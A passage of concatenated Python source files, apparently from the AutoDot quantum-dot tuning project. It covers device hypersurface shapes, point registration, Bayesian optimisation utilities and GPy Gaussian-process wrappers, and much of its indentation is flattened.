def __init__(self, ndim, th_leak=-500, idx=0):
self.th_leak = th_leak
self.leak_gate = idx
def __call__(self, x):
x = np.array(x)
leak = x[:, self.leak_gate] > self.th_leak
return leak
# change
class Convexhull(object):
    def __init__(self, ndim, points=[-1000, 0, [-1000, 0], [0, -1000]]):
        # points: 2D array (num_points x ndim)
        points = list(points)  # copy so the shared default argument is never mutated
        for i, point in enumerate(points):
if np.isscalar(point):
points[i] = point * np.ones(ndim)
points = np.array(points)
from scipy.spatial import Delaunay
self.hull = Delaunay(points)
self.ndim = points.shape[1]
def __call__(self, x):
return self.hull.find_simplex(x) >= 0
class Crosstalk_box(Convexhull):
def __init__(self, ndim, a=-1500, b=1500, a_prime=-1000):
if np.isscalar(a):
a = a * np.ones(ndim)
if np.isscalar(b):
b = b * np.ones(ndim)
if np.isscalar(a_prime):
a_prime = a_prime * np.ones(ndim)
a = np.array(a)
b = np.array(b)
if np.any(a > b): raise ValueError('a should be less than b')
vertices = np.array(np.meshgrid(*list(zip(a, b)))).T.reshape(-1, ndim)
# Replace the first vertex with b
vertices[0] = a_prime
from scipy.spatial import Delaunay
self.hull = Delaunay(vertices)
self.ndim = vertices.shape[1]
class Crosstalk_matrix_box:
def __init__(self, ndim, mean=0, stdev=1.2, max=[-1200, -1200, -1200]):
"""
Creates a device hypersurface for a device with ndim (barrier) gates
Crosstalk between gates is defined by crosstalk matrix (define_crosstalk_matrix)
This matrix is randomly generated using gaussian from mean, stdev provided in init (from config).
"""
self.mean = mean
self.stdev = stdev
self.ndim = ndim
self.max = np.array(max)
# self.matrix = self.define_crosstalk_matrix(self.ndim, self.mean, self.stdev)
print("Matrix not randomly generated. Change in Playground/shapes.py")
self.matrix = np.array([[1.00000000e+00, 2.25765077e-01, 1.25099259e-03, 8.05792338e-08,
9.45403448e-13],
[2.66750478e-01, 1.00000000e+00, 3.26841059e-01, 4.12765083e-04,
5.35202839e-08],
[2.03396254e-03, 1.85905049e-01, 1.00000000e+00, 1.43947865e-01,
7.78828027e-04],
[8.45614836e-08, 2.73164211e-03, 2.09218832e-01, 1.00000000e+00,
2.73003173e-01],
[4.61575699e-13, 1.89962878e-08, 3.65315897e-04, 3.68532330e-01,
1.00000000e+00]])
def __call__(self, x):
x = np.array(x)
check = self.matrix.dot(x.T) > self.max[:, np.newaxis]
shape = np.all(check[:, :], axis=0)
return shape
def define_crosstalk_matrix(self, ndim, mean, stdev):
dims = (ndim, ndim)
gaussian = scipy.stats.norm(mean, stdev)
maximum = gaussian.pdf(mean)
def f(i, j):
# Create array of random values (0, 0.3) to add to crosstalk matrix
randoms = np.random.random(dims) * 0.3
# Add to index difference (i - j) to maintain gaussian
# np.sign so that they shift away from mean not just towards higher value
difference = i - j
return gaussian.pdf(difference + (randoms * np.sign(j - i))) / maximum
matrix = np.fromfunction(lambda i, j: f(i, j), dims, dtype='float32')
# Plot the matrix that represents the crosstalk. Blues cmap to make it similar to the Volk qubyte paper
import matplotlib.pyplot as plt
plt.matshow(matrix, cmap='Blues')
return matrix
```
#### File: AutoDot/Registration/perfect_hypercube.py
```python
import numpy as np
def generate_points_on_hypercube(nsamples,origin,poffs,p=None,uvecs=None):
if uvecs is None:
epsilon = []
bounds = []
for i in range(len(origin)):
origin_c = np.copy(origin)
poffs_c = np.copy(poffs)
origin_c[i] = poffs_c[i]
bounds += [origin_c]
print(origin_c,poffs_c)
epsilon += [np.linalg.norm(origin_c-poffs_c)]
epsilon = np.array(epsilon)
if p is None:
p = epsilon/epsilon.sum()
print(p)
points = []
for i in range(nsamples):
face = np.random.choice(len(origin),p=p)
points+=[np.random.uniform(bounds[face],poffs)]
return np.array(points)
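# Each sample lies on one axis-aligned face of the box spanned by origin and
# poffs; face i (coordinate i pinned to poffs[i]) is chosen with probability
# proportional to that face's diagonal length by default. See the __main__
# demo at the bottom of this file.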
def clean_pointset(pointset):
pointset = np.copy(pointset)
for point in pointset:
toremove = np.where(np.all(np.less(pointset,point),axis=1))[0]
pointset = np.delete(pointset,toremove,axis=0)
#for point in pointset:
# print(np.less(pointset,point))
# print(np.where(np.logical_all(pointset<point)))
return pointset
if __name__ == "__main__":
p = generate_points_on_hypercube(200,[120,40],[-200,-300],None)
print(p)
import matplotlib.pyplot as plt
plt.scatter(*p.T)
plt.show()
```
#### File: AutoDot/Registration/simple_hyper_surf_test.py
```python
from functools import partial
import matplotlib.pyplot as plt
from registration_core import notranslation_affine_registration,simple_affine_registration,deformable_registration
import numpy as np
def visualize(iteration, error, X, Y):
min_l = np.minimum(X.shape[0],Y.shape[0])
abs_error = np.linalg.norm(X[:min_l]-Y[:min_l],axis=-1)
print(iteration,error,np.sum(abs_error)/min_l)
#diffs = X[:min_l]-Y[:min_l]
#print(np.std(diffs,axis=0))
#surface_points = np.load("data//moving_B2t2_cd2.npy")
surface_points_target = np.load("data//save_Florian_redo//vols_poff_prev.npy")
surface_points = np.load("data//save_Florian_redo//vols_poff_after.npy")#[:,[0,1,2,3,4,6,7]]
#surface_points_target = np.load("data//target_B2t2_cd1.npy")
#surface_points = np.load("data//moving_B1t2_b1.npy")
#surface_points_target = np.load("data//target_B1t2_b2.npy")
#surface_points = np.load("data//moving_B1t2_b1.npy")
#surface_points_target = np.load("data//target_B2t2_cd1.npy")
#"""
min_l = np.minimum(len(surface_points), len(surface_points_target))
usefull = np.logical_and(~np.any(surface_points<-1990,axis=1)[:min_l],~np.any(surface_points_target<-1990,axis=1)[:min_l])
surface_points = surface_points[:min_l][usefull]
surface_points_target = surface_points_target[:min_l][usefull]
#"""
print(surface_points.shape,surface_points_target.shape)
callback = partial(visualize)
reg = notranslation_affine_registration(**{ 'X': np.copy(surface_points_target), 'Y': np.copy(surface_points)})
reg.register(callback)
device_change = reg.B-np.diag(np.ones(7))
m_cmap = np.abs(device_change).max()
m_cmap = 0.3
plt.imshow(device_change.T,vmin=-m_cmap,vmax=m_cmap,cmap='PuOr')
xlabels = ['$V_1$', '$V_2$', '$V_3$', '$V_4$', '$V_5$', '$V_7$', '$V_8$']
ylabels = ['$VT_1$', '$VT_2$', '$VT_3$', '$VT_4$', '$VT_5$', '$VT_7$', '$VT_8$']
xlabs = np.linspace(0,6,7)
plt.xticks(xlabs,xlabels)
plt.yticks(xlabs,ylabels)
plt.colorbar()
plt.savefig("B1t2_transformation.svg")
plt.show()
np.save("vols_poff_transformed_prevb1b2.npy",reg.TY)
np.save("vols_poff_prevb1b2.npy",reg.Y)
np.save("vols_poff_afterb1b2.npy",reg.X)
print(np.linalg.det(reg.B),m_cmap)
#np.save("data/registrated_pointset_B1toB2.npy",reg.TY)
```
#### File: AutoDot/Sampling/BO_common.py
```python
from functools import partial
from multiprocessing import Pool
import numpy as np
from scipy.stats import norm # for calculating normpdf, normcdf
from scipy import optimize # for optimisation
from pyDOE import lhs # Latin hypercube sampling
#import scipydirect # optional dependency, used only by optimize_DIRECT below
# for minimisation
def EI( best_prev, mean_x, std_x, min_obj=True , dmdx=None, dsdx=None ):
#diff = best_prev - mean_x
#return diff*norm.cdf(diff/std_x) + std_x*norm.pdf(diff/std_x)
    diff = best_prev - mean_x
    if min_obj is False:
        diff = -diff # max problem
    z = diff/std_x  # use the sign-corrected improvement so max problems work too
    phi, Phi = norm.pdf(z), norm.cdf(z)
if dmdx is not None and dsdx is not None:
#https://github.com/SheffieldML/GPyOpt/blob/master/GPyOpt/acquisitions/EI.py
if min_obj:
dEIdx = dsdx * phi - Phi * dmdx
else:
dEIdx = dsdx * phi + Phi * dmdx
else:
dEIdx = None
return std_x*(z*Phi + phi), dEIdx
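# Quick numeric sanity check (hand-picked numbers): with best_prev=1.0,
# mean_x=0.0, std_x=1.0 we get z=1, so EI = Phi(1) + phi(1) ~ 0.8413 + 0.2420 = 1.083.
# ei, _ = EI(1.0, 0.0, 1.0)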
def augmented_EI( best_prev, mean_x, std_x, std_noise, min_obj=True, dmdx=None, dsdx=None ):
    var_sum = np.square(std_noise) + np.square(std_x)
    # a local named EI would shadow the function before the call and raise
    # UnboundLocalError, so bind the returned value to a different name
    ei_val, _ = EI( best_prev, mean_x, std_x, min_obj, dmdx, dsdx)
    aug_EI = ei_val * (1.0 - std_noise/np.sqrt(var_sum))
    # WARNING: gradient is not implemented yet
    return aug_EI, None
def sample_lhs_basic(ndim, num_samples):
# returns a num_samples x ndim array
lhd = lhs(ndim, samples=num_samples)
return lhd
def sample_lhs_bounds(lb, ub, num_samples):
# returns a num_samples x ndim array
if lb.ndim != 1 or ub.ndim != 1:
raise ValueError('Bounds should be 1-dim. vectors.')
if lb.size != ub.size:
raise ValueError('Length of lb should be same with ub.')
if np.any(lb > ub):
raise ValueError('lb cannot be larger than ub.')
ndim = ub.size
diff = ub - lb
lhd = sample_lhs_basic(ndim, num_samples)
lhd = lhd * diff + lb
return lhd
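# Example (toy bounds): five Latin-hypercube samples in the box [0,1] x [10,20]
# lhd = sample_lhs_bounds(np.array([0., 10.]), np.array([1., 20.]), 5)  # shape (5, 2)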
# TODO: check trust-constr params
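# NOTE: this definition is shadowed by the second optimize_trust_constr further below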
def optimize_trust_constr(x0, f, lb, ub, const_func=None, maxiter=200):
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)]
# constraint: const_func(x) == 0
const = optimize.NonlinearConstraint(const_func, 0.0, 0.0)
res = optimize.minimize(f, x0=x0, method='trust-constr', jac='3-point', hess='3-point', bounds=bounds, constraints=const)
result_x = np.atleast_1d(res.x)
result_fx = np.atleast_1d(res.fun)
return result_x, result_fx
def optimize_lbfgs(x0, f, lb, ub, const_func=None, maxiter=200):
if const_func is not None:
f_augmented = lambda x : f(x) + 10000.*const_func(x)
else:
f_augmented = f
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)]
    res = optimize.fmin_l_bfgs_b(f_augmented,x0=x0,bounds=bounds,approx_grad=True, maxiter=maxiter)
d = res[2]
if d['task'] == b'ABNORMAL_TERMINATION_IN_LNSRCH':
result_x = np.atleast_1d(x0)
else:
result_x = np.atleast_1d(res[0])
result_fx = f(result_x)
    const_val = const_func(result_x) if const_func is not None else None
converged = True
if d['warnflag'] != 0:
converged = False
disp = True
if converged is False and disp is True:
if d['warnflag'] == 1:
print('Too many function evaluations or iterations')
elif d['warnflag'] == 2:
print('Stopped for another reason')
print('x: ', result_x, ', fx: ', result_fx)
print('gradient: ', d['grad'], ', constraint: ', const_val )
return result_x, result_fx, {'converged':converged, 'const_val':const_val}
def optimize_Largrange(x0, f, lb, ub, const_func, maxiter=200):
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)] + [(0.0, np.inf)]
f_augmented = lambda x : f(x[:-1]) + x[-1]*const_func(x[:-1])
x0 = np.append(x0, 1.0) # initial lambda
res = optimize.fmin_l_bfgs_b(f_augmented,x0=x0,bounds=bounds,approx_grad=True, maxiter=maxiter)
d = res[2]
if d['task'] == b'ABNORMAL_TERMINATION_IN_LNSRCH':
result_x = np.atleast_1d(x0)[:-1]
else:
result_x = np.atleast_1d(res[0])[:-1]
result_fx = f(result_x)
const_val = const_func(result_x)
converged = True
if d['warnflag'] != 0:
converged = False
disp = True
if converged is False and disp is True:
if d['warnflag'] == 1:
print('Too many function evaluations or iterations')
elif d['warnflag'] == 2:
print('Stopped for another reason')
print('x: ', result_x, ', lambda: ', res[0][-1], ', fx: ', result_fx)
print('gradient: ', d['grad'], ', constraint: ', const_val )
return result_x, result_fx, {'converged':converged, 'const_val':const_val}
def optimize_trust_constr(x0, f, lb, ub, const_func, maxiter=200):
bounds = optimize.Bounds(lb, ub)
nonlin_const = optimize.NonlinearConstraint(const_func, 0.0, 0.0, jac=const_func.J, hess=const_func.H)
res = optimize.minimize(f, x0, method='trust-constr', constraints=[nonlin_const], bounds=bounds)
    converged = res.status in (1, 2)
return res.x, res.fun, {'converged':converged, 'const_val':res.constr[0]}
def optimize_SLSQP(x0, f, lb, ub, const_func, maxiter=200):
bounds = optimize.Bounds(lb, ub)
eq_cons = {'type': 'eq',
'fun': const_func,
'jac': const_func.J}
res = optimize.minimize(f, x0, method='SLSQP', constraints=[eq_cons], bounds=bounds, options={'ftol': 1e-9})
    converged = res.status == 0
const_val = const_func(res.x)
return res.x, res.fun, {'converged':converged, 'const_val':const_val}
def filter_results(result_filter, x_all, fx_all, stat_all):
if callable(result_filter):
filtered_all = [result_filter(stat) for stat in stat_all]
if any(filtered_all):
x_all = [x for (x,filtered) in zip(x_all, filtered_all) if filtered]
fx_all = [fx for (fx,filtered) in zip(fx_all, filtered_all) if filtered]
stat_all = [stat for (stat,filtered) in zip(stat_all, filtered_all) if filtered]
else:
print('WARNING: No result can satisfy the result filter')
return x_all, fx_all, stat_all
def optimize_multi_x0(opt_func, x0_all, f, lb, ub, const_func, maxiter=200, result_filter=None):
num_x0 = len(x0_all)
# run the optimizer with multiple restarts
x_found_all = list()
fx_found_all = list()
stat_all = list()
for idx_x0 in range(len(x0_all)):
x0 = x0_all[idx_x0]
result_x, result_fx, stat = opt_func(x0, f, lb, ub, const_func=const_func, maxiter=maxiter)
x_found_all.append(result_x)
fx_found_all.append(result_fx)
stat_all.append(stat)
x_found_all, fx_found_all, stat_all = filter_results(result_filter, x_found_all, fx_found_all, stat_all)
idx_min = np.argmin(fx_found_all) # index of max EI
x_min = x_found_all[idx_min]
fx_min = fx_found_all[idx_min]
return x_min, fx_min
def optimize_multi_x0_parallel(opt_func, x0_all, f, lb, ub, const_func, maxiter=200, result_filter=None, num_proc=4):
#f_x0 = lambda x0 : opt_func(x0, f, lb, ub, const_func=const_func, maxiter=maxiter)
f_x0 = partial(opt_func, f=f, lb=lb, ub=ub, const_func=const_func, maxiter=maxiter)
pool = Pool(processes=num_proc)
x0_all = [x0 for x0 in x0_all]
list_tuples = pool.map(f_x0, x0_all)
x_found_all, fx_found_all, stat_all = zip(*list_tuples) # list of tuples to multiple lists
x_found_all, fx_found_all, stat_all = filter_results(result_filter, x_found_all, fx_found_all, stat_all)
idx_min = np.argmin(fx_found_all) # index of max EI
x_min = x_found_all[idx_min]
fx_min = fx_found_all[idx_min]
return x_min, fx_min
def optimize_DIRECT(f, lb, ub, const_func, maxiter=200):
dim = lb.size
bounds = [(lb[i],ub[i]) for i in range(dim)]
f_augmented = lambda x : f(x) + 10.*const_func(x)
res = scipydirect.minimize(f_augmented, bounds=bounds)
print(res)
x = res['x']
print(const_func(x))
print(f(x))
return res['x'], res['fun']
class Constraint_SS(object):
'''
Sum of squared values
'''
def __call__(self, x):
return np.sum(np.square(x)) -1.0 # constraint to make length 1.0
def J(self, x):
#print(x)
return [2.0 * x]
def H(self, x, v):
#print(x,v)
return v * 2.0 * np.eye(x.size)
class Constraint_Sum(object):
'''
Sum of values
'''
def __call__(self, x):
return np.sum(x) - 1.0 # constraint to make length 1.0
    def J(self, x):
        return [np.ones_like(x)]  # d/dx (sum(x) - 1) is a vector of ones
def H(self, x, v):
return np.zeros((x.size,x.size))
def uniform_to_hypersphere(samples):
samples = norm.ppf(samples) # change to normally distributed samples
samples = np.fabs(samples) # make to one-sided samples
samples = -samples/np.sqrt(np.sum(np.square(samples),axis=1,keepdims=True)) # length to 1, direction to negative side
return samples
def random_hypersphere(dim, num_samples):
samples = np.random.uniform(size=(num_samples,dim))
#return (-directions[np.newaxis,:])*uniform_to_hypersphere(samples)
return uniform_to_hypersphere(samples)
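# Every row is a unit vector pointing into the negative orthant:
# u = random_hypersphere(3, 4)
# np.allclose(np.linalg.norm(u, axis=1), 1.0)  # -> True
# np.all(u < 0)                                # -> True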
def lhs_hypersphere(dim, num_samples):
samples = sample_lhs_basic(dim, num_samples) # could be confusing with param. of np.random.uniform
return uniform_to_hypersphere(samples)
def random_hypercube(point_lb, point_ub, num_samples):
assert len(point_lb) == len(point_ub)
ndim = len(point_lb)
interval = point_ub - point_lb
offset = point_lb
samples = np.random.uniform(size=(num_samples,ndim))*interval[np.newaxis,:] + offset
#print(samples)
return samples
'''
def random_hypercube(point_lb, point_ub, num_samples):
assert len(point_lb) == len(point_ub)
ndim = len(point_lb)
# choose a face
face_idx = np.random.randint(ndim) # coordinate of this index is point_lb[face_idx]
face_lb = np.append(point_lb[:face_idx], point_lb[face_idx+1:])
face_ub = np.append(point_ub[:face_idx], point_ub[face_idx+1:])
interval = point_ub - point_lb
interval[face_idx] = 0.
offset = point_lb
samples = np.random.uniform(size=(num_samples,ndim))*interval[np.newaxis,:] + offset
#print(samples)
return samples
# convert samples to unit vectors
#u_samples = (samples-point_ub[np.newaxis,:])/np.sqrt(np.sum(np.square(samples),axis=1,keepdims=True)) # length to 1, direction to negative side
#return u_samples
'''
# for test lhd
def main():
lb = np.array([1.0, 2.0, 3.0])
ub = np.array([2.0, 3.0, 4.0])
lhd = sample_lhs_bounds(lb,ub,10)
print(lhd)
if __name__ == "__main__":
main()
```
#### File: Sampling/gp/GP_interface.py
```python
import numpy as np
class GPInterface(object):
def __init__(self):
self.kernel = None
self.ndim = None
self.model = None
self.outdim = 1
def create_kernel(self, ndim, kernel_name, var_f=1.0, lengthscale=1.0):
pass
def create_model(self, x, y, noise_var, noise_prior):
pass
def predict_f(self, x, full_cov=False):
pass
def optimize(self, num_restarts=30, opt_messages=False, print_result=False):
pass
def convert_lengthscale(ndim, lengthscale):
if np.isscalar(lengthscale):
l = lengthscale * np.ones(ndim)
else:
l = lengthscale
return l
def convert_2D_format(arr):
if not isinstance(arr, np.ndarray):
raise ValueError('The array is not a numpy array.')
if arr.ndim == 1:
return arr[:, np.newaxis] # asuumes arr is single dimensional data
if arr.ndim == 2:
return arr
else:
raise ValueError('The array cannot be more than 2 dimensional')
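# Example: a flat length-3 array becomes a single column,
# convert_2D_format(np.array([1., 2., 3.])).shape  # -> (3, 1)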
```
#### File: Sampling/gp/GP_models.py
```python
from .GPy_wrapper import GPyWrapper_Classifier as GPC
from . import GP_util
import numpy as np
import multiprocessing
from ...main_utils.dict_util import Tuning_dict
class GP_base():
def __init__(self,n,bound,origin,configs,GP_type=False):
self.GP_type = GP_type
self.n,self.bound,self.origin=n,np.array(bound),np.array(origin)
self.c = Tuning_dict(configs)
self.create_gp()
def create_gp(self):
l_p_mean, l_p_var = self.c.get('length_prior_mean','length_prior_var')
n = self.n
l_prior_mean = l_p_mean * np.ones(n)
l_prior_var = (l_p_var**2) * np.ones(n)
if self.GP_type == False:
r_min, var_p_m_div = self.c.get('r_min','var_prior_mean_divisor')
r_min, r_max = r_min, np.linalg.norm(self.bound-self.origin)
v_prior_mean = ((r_max-r_min)/var_p_m_div)**2
self.gp = GP_util.create_GP(self.n, *self.c.get('kernal'), v_prior_mean, l_prior_mean, (r_max-r_min)/2.0)
GP_util.set_GP_prior(self.gp, l_prior_mean, l_prior_var, None, None) # do not set prior for kernel var
GP_util.fix_hyperparams(self.gp, False, True)
else:
v_prior_mean, v_prior_var = self.c.get('var_prior_mean','var_prior_var')
v_prior_var = v_prior_var**2
self.gp = GP_util.create_GP(self.n, *self.c.get('kernal'), lengthscale=l_prior_mean, const_kernel=True, GP=GPC)
GP_util.set_GP_prior(self.gp, l_prior_mean, l_prior_var, v_prior_mean, v_prior_var)
def train(self,x,y,*args,**kwargs):
self.gp.create_model(x, y, *args, **kwargs)
def optimise(self,**kwargs):
if self.GP_type == False:
self.gp.optimize(*self.c.get('restarts'),parallel=True,**kwargs)
else:
self.gp.optimize()
#inside = get_between(self.origin,self.bounds,points_poff)
#u_all_gp, r_all_gp = util.ur_from_vols_origin(points_poff[inside], self.origin, returntype='array')
#self.gp.create_model(u_all_gp, r_all_gp[:,np.newaxis], (self.tester.d_r/2)**2, noise_prior='fixed')
def predict(self,x):
if self.GP_type == False:
return self.gp.predict_f(x)
else:
return self.gp.predict_prob(x)
class GPC_heiracical():
def __init__(self,n,bound,origin,configs):
self.built = [False]*len(configs)
self.gp = []
for config in configs:
self.gp += [GP_base(n,bound,origin,config,GP_type=True)]
def train(self,x,y_cond):
x = np.array(x)
for i,gp in enumerate(self.gp):
            use_to_train = np.array([True]*x.shape[0]) if i == 0 else y_cond[:,i-1]
count_pos = use_to_train[use_to_train].size
count_pos_of_pos = np.sum(y_cond[use_to_train,i])
print("There are %i training examples for model %i and %i are positive"%(count_pos,i,count_pos_of_pos))
if count_pos>0:
gp.train(x[use_to_train],y_cond[use_to_train,i])
self.built[i] = True
    def optimise(self,parallel=False):
        if parallel:
            def f(i):
                self.gp[i].optimise()
            # a closure cannot be pickled by multiprocessing.Pool, so the
            # parallel path uses a thread pool instead
            from multiprocessing.pool import ThreadPool
            with ThreadPool(processes=multiprocessing.cpu_count()) as pool:
                pool.map(f, range(len(self.gp)))
        else:
            for i,gp in enumerate(self.gp):
                if self.built[i]:
                    gp.optimise()
def predict(self,x):
results = []
for i,gp in enumerate(self.gp):
if self.built[i]:
results += [gp.predict(x)]
return results
def predict_comb_prob(self,x):
probs = self.predict(x)
total_prob = np.prod(probs, axis=0)
return total_prob
```
#### File: Sampling/gp/GPy_wrapper.py
```python
import numpy as np
import GPy
from .GP_interface import GPInterface, convert_lengthscale, convert_2D_format
class GPyWrapper(GPInterface):
def __init__(self):
# GPy settings
GPy.plotting.change_plotting_library("matplotlib") # use matpoltlib for drawing
super().__init__()
self.center = 0.0
def create_kernel(self, ndim, kernel_name, var_f=1.0, lengthscale=1.0, const_kernel=False):
if kernel_name == 'Matern52':
l = convert_lengthscale(ndim, lengthscale)
kernel = GPy.kern.Matern52(input_dim=ndim, ARD=True, variance=var_f, lengthscale=l, name='basic')
elif kernel_name == 'RBF':
l = convert_lengthscale(ndim, lengthscale)
kernel = GPy.kern.RBF(input_dim=ndim, ARD=True, variance=var_f, lengthscale=l, name='basic')
else:
raise ValueError('Unsupported kernel: '+ kernel_name)
self.ndim = ndim
self.kernel = kernel
if const_kernel:
self.kernel += GPy.kern.Bias(1.0)
self.stat_kernel = self.kernel.basic
else:
self.stat_kernel = self.kernel
def set_kernel_length_prior(self, prior_mean, prior_var):
if self.ndim != len(prior_mean) or self.ndim != len(prior_var):
raise ValueError('Incorrect kernel prior parameters.')
if self.kernel is None:
raise ValueError('Kernel should be defined first.')
for i in range(self.ndim):
self.stat_kernel.lengthscale[[i]].set_prior(GPy.priors.Gamma.from_EV(prior_mean[i],prior_var[i])) # don't know why, but [i] does not work
def set_kernel_var_prior(self, prior_mean, prior_var):
self.stat_kernel.variance.set_prior(GPy.priors.Gamma.from_EV(prior_mean,prior_var))
def fix_kernel_lengthscale(self):
self.stat_kernel.lengthscale.fix()
def fix_kernel_var(self):
self.stat_kernel.variance.fix()
def create_model(self, x, y, noise_var, noise_prior='fixed'):
x = convert_2D_format(x)
y = convert_2D_format(y) - self.center
self.outdim = y.shape[1]
noise_var = np.array(noise_var)
if noise_var.ndim == 0:
self.model = GPy.models.GPRegression(x, y, self.kernel, noise_var=noise_var)
noise = self.model.Gaussian_noise
else:
assert noise_var.shape == y.shape
self.model = GPy.models.GPHeteroscedasticRegression(x, y, self.kernel)
self.model['.*het_Gauss.variance'] = noise_var
noise = self.model.het_Gauss.variance
if noise_prior == 'fixed':
noise.fix()
else:
raise ValueError('Not Implemented yet.')
def predict_f(self, x, full_cov=False):
'''
Returns:
posterior mean, posterior variance
'''
x = convert_2D_format(x)
post_mean, post_var = self.model.predict_noiseless(x, full_cov=full_cov)
if self.outdim > 1:
post_var = np.concatenate([post_var]*self.outdim, axis=-1)
return post_mean + self.center, post_var
def predict_withGradients(self, x):
'''
Borrowed from https://github.com/SheffieldML/GPyOpt/blob/master/GPyOpt/models/gpmodel.py
Returns the mean, standard deviation, mean gradient and standard deviation gradient at X.
'''
x = convert_2D_format(x)
m, v = self.model.predict(x)
v = np.clip(v, 1e-10, np.inf)
dmdx, dvdx = self.model.predictive_gradients(x)
dmdx = dmdx[:,:,0]
dsdx = dvdx / (2*np.sqrt(v))
return m + self.center, np.sqrt(v), dmdx, dsdx
def posterior_sample_f(self, x, size = 10):
'''
Parameters
x: (Nnew x input_dim)
Returns
(Nnew x output_dim x samples)
'''
return self.model.posterior_samples_f(x, size) + self.center
def optimize(self, num_restarts=30, opt_messages=False, print_result=True, parallel=False):
self.model.optimize_restarts(num_restarts=num_restarts, robust=True, parallel=False, messages=opt_messages)
if print_result:
print(self.kernel)
print(self.stat_kernel.lengthscale)
print(self.stat_kernel.variance)
class GPyWrapper_Classifier(GPyWrapper):
def create_model(self, x, y):
assert self.center == 0.0
x = convert_2D_format(x)
y = convert_2D_format(y)
self.outdim = y.shape[1]
self.model = GPy.models.GPClassification(x, y, self.kernel)
def predict_prob(self, x):
x = convert_2D_format(x)
prob = self.model.predict(x, full_cov=False)[0]
return prob
def optimize(self, maxiter=1000, opt_messages=False, print_result=True):
for i in range(5):
self.model.optimize(max_iters=int(maxiter/5), messages=opt_messages)
if print_result:
print(self.kernel)
print(self.stat_kernel.lengthscale)
class GPyWrapper_MultiSeparate(object):
def create_kernel(self, ndim, outdim, kernel_name, var_f=1.0, lengthscale=1.0, const_kernel=False):
if isinstance(kernel_name, str):
kernel_name = [kernel_name]*outdim
if np.isscalar(var_f):
var_f = np.ones(outdim) * var_f
        if np.isscalar(lengthscale):
            lengthscale = np.ones(outdim) * lengthscale
if isinstance(const_kernel, bool):
const_kernel = [const_kernel]*outdim
self.gp_list = list()
for i in range(outdim):
gp = GPyWrapper()
gp.create_kernel(ndim, kernel_name[i], var_f[i], lengthscale[i], const_kernel[i])
self.gp_list.append(gp)
self.outdim = outdim
def set_kernel_length_prior(self, prior_mean, prior_var):
# Apply same prior for all outputs
for i in range(self.outdim):
self.gp_list[i].set_kernel_length_prior(prior_mean, prior_var)
def set_kernel_var_prior(self, prior_mean, prior_var):
# Apply same prior for all outputs
for i in range(self.outdim):
self.gp_list[i].set_kernel_var_prior(prior_mean, prior_var)
def fix_kernel_lengthscale(self):
for i in range(self.outdim):
self.gp_list[i].fix_kernel_lengthscale()
def fix_kernel_var(self):
for i in range(self.outdim):
self.gp_list[i].fix_kernel_var()
def create_model(self, x, y, noise_var, noise_prior='fixed'):
if not (y.ndim == 2 and y.shape[1] == self.outdim):
raise ValueError('Incorrect data shape.')
noise_var = np.array(noise_var)
for i in range(self.outdim):
if noise_var.ndim == 2 and noise_var.shape[1] == self.outdim:
noise_var_i = noise_var[:, i:i+1]
else:
noise_var_i = noise_var
gp = self.gp_list[i]
gp.create_model(x, y[:,i:i+1], noise_var_i, noise_prior)
def predict_f(self, x, full_cov=False):
post_mean_all = list()
post_var_all = list()
for i in range(self.outdim):
post_mean, post_var = self.gp_list[i].predict_f(x, full_cov)
post_mean_all.append(post_mean)
post_var_all.append(post_var)
return np.concatenate(post_mean_all,axis=-1), np.concatenate(post_var_all,axis=-1)
def posterior_sample_f(self, x, size = 10):
post_samples_all = list()
for i in range(self.outdim):
            post_samples = self.gp_list[i].posterior_sample_f(x, size)
post_samples_all.append(post_samples)
return np.concatenate(post_samples_all,axis=1)
def optimize(self, num_restarts=30, opt_messages=False, print_result=False):
for i in range(self.outdim):
self.gp_list[i].optimize(num_restarts, opt_messages, print_result)
def predict_withGradients(self, x):
'''
Borrowed from https://github.com/SheffieldML/GPyOpt/blob/master/GPyOpt/models/gpmodel.py
Returns the mean, standard deviation, mean gradient and standard deviation gradient at X.
m_all: (num_x, outdim)
std_all: (num_x, outdim)
dmdx_all: (num_x, outdim, n_dim)
dsdx_all: (num_x, outdim, n_dim)
'''
m_all, std_all, dmdx_all, dsdx_all = [], [], [], []
for i in range(self.outdim):
m, std, dmdx, dsdx = self.gp_list[i].predict_withGradients(x)
m_all.append(m)
std_all.append(std)
dmdx_all.append(dmdx)
dsdx_all.append(dsdx)
return np.concatenate(m_all,axis=-1), np.concatenate(std_all,axis=-1), np.stack(dmdx_all,axis=1), np.stack(dsdx_all,axis=1)
class GPyWrapper_MultiIndep(GPyWrapper):
def create_kernel(self, ndim, outdim, kernel_name, var_f=1.0, lengthscale=1.0, const_kernel=False):
super().create_kernel(ndim, kernel_name, var_f, lengthscale, const_kernel)
k_multi = GPy.kern.IndependentOutputs([self.kernel, self.kernel.copy()])
#icm = GPy.util.multioutput.ICM(input_dim=ndim, num_outputs=outdim, kernel=self.kernel)
#icm.B.W.constrain_fixed(0) # fix W matrix to 0
if const_kernel:
self.stat_kernel = k_multi.sum.basic
else:
self.stat_kernel = k_multi.basic
self.kernel = k_multi
print(self.kernel)
def create_model(self, x, y, noise_var, noise_prior='fixed'):
x = convert_2D_format(x)
y = convert_2D_format(y) - self.center
numdata = x.shape[0]
outdim = y.shape[1]
indim = x.shape[1]
yy = y.transpose().ravel()
ind = np.concatenate([ o*np.ones(numdata) for o in range(outdim)])
xx = np.concatenate([x]*outdim)
xx = np.concatenate((xx,ind[:,np.newaxis]), axis=1)
        print(xx.shape, yy.shape)
        # the IndependentOutputs kernel expects the stacked design matrix with
        # the output index appended as the final column
        self.model = GPy.models.GPRegression(xx, yy[:, np.newaxis], self.kernel, noise_var=noise_var)
if noise_prior == 'fixed':
self.model.Gaussian_noise.fix()
else:
raise ValueError('Not Implemented yet.')
def create_GP(num_active_gates, outdim, k_name='Matern52', var_f=1.0, lengthscale=1.0, center=0.0):
if np.isscalar(lengthscale):
lengthscale = np.ones(num_active_gates)
gp = GPyWrapper() # initialize GP environment
#gp = GPyWrapper_MultiIndep() # initialize GP environment
gp.center = center
# GP kernels
gp.create_kernel(num_active_gates, k_name, var_f, lengthscale)
#gp.create_kernel(num_active_gates, outdim, k_name, var_f, lengthscale)
return gp
def main():
X = np.arange(1,6).reshape((5,1))
f = lambda x : np.square(x-4.0)
#Y = np.concatenate([f(X), -f(X)], axis=1)
Y = np.concatenate([f(X)], axis=1)
#noise_var = 0.01**2
#noise_var = np.concatenate([np.square(X / 10.)]*2, axis=1)
noise_var = np.square(X / 10.)
print(X.shape, Y.shape)
